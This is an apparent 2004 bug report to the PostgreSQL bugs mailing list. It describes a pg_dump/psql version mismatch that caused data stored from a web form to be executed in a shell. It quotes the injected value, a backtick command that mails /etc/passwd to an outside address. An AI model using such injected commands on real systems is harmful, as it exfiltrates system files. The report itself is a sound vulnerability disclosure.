syntax error causes crafted data to be executed in shell

From: "Thomer M(dot) Gil" <postgresql(at)thomer(dot)com>
To: pgsql-bugs(at)postgresql(dot)org
Subject: syntax error causes crafted data to be executed in shell
Date: 2004-12-17 18:38:02
Lists: pgsql-bugs

Short summary:

1. Someone wrote "`mail blah(at)blah(dot)com < /etc/passwd`" in a web form;
this string was stored in a postgresql database.
2. We ran pg_dump
3. We ran psql (not the same version as pg_dump!)
4. blah(at)blah(dot)com receives /etc/passwd

More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:

Thank you,

Thomer